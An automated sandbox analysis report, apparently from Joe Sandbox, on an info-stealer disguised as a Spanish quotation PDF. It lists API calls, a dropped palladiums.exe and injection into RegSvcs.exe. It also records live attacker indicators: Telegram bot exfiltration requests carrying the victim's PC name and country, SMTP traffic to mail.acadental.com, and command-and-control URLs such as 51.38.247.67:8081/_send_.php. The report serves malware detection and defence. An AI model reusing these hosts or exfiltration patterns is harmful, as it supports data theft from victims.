Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00279642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00279642
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_0027979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0027979D
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00279B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00279B2B
Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Code function: 0_2_00275C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00275C97
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0055DBBE
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0052C2A2 FindFirstFileExW,	2_2_0052C2A2
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_005668EE FindFirstFileW,FindClose,	2_2_005668EE
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0056698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_0056698F
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0055D076
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0055D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0055D3A9
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00569642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00569642
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_0056979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0056979D
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00569B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00569B2B
Source: C:\Users\user\AppData\Local\silvexes\palladiums.exe	Code function: 2_2_00565C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00565C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 027CF45Dh	3_2_027CF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 027CF45Dh	3_2_027CF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 027CFC19h	3_2_027CF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 019EF2EDh	7_2_019EF150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 019EF2EDh	7_2_019EF33C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 019EFAA9h	7_2_019EF7F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B50D0Dh	7_2_06B50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B51697h	7_2_06B50B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B531E8h	7_2_06B52DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B52C21h	7_2_06B52970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5F8C9h	7_2_06B5F620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06B50673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5FD21h	7_2_06B5FA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5DA61h	7_2_06B5D7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5D1B1h	7_2_06B5CF08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5D609h	7_2_06B5D360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5E769h	7_2_06B5E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5DEB9h	7_2_06B5DC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5E311h	7_2_06B5E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06B50853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06B50040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5F471h	7_2_06B5F1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B531E8h	7_2_06B52DCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B531E8h	7_2_06B53116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5EBC1h	7_2_06B5E918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06B5F019h	7_2_06B5ED70

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.palladiums.exe.3880000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.palladiums.exe.e20000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.5:49828 -> 3.130.71.34:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2020/12/2024%20/%2005:55:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2019/12/2024%20/%2013:25:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49738 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49800 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49790 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49783 -> 104.21.67.152:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 104.21.67.152:443

Source: global traffic

TCP traffic: 192.168.2.5:49828 -> 3.130.71.34:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49776 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe

Code function: 0_2_0027CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0027CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2020/12/2024%20/%2005:55:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2019/12/2024%20/%2013:25:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.acadental.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Dec 2024 12:45:27 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Dec 2024 12:45:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000352E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: palladiums.exe, 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4572292485.0000000000434000.00000040.80000000.00040000.00000000.sdmp, palladiums.exe, 00000006.00000002.2322323481.0000000000E20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4574535869.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000354E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.000000000352E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.acadental.com
Source: RegSvcs.exe, 00000003.00000002.4574535869.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4574423762.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
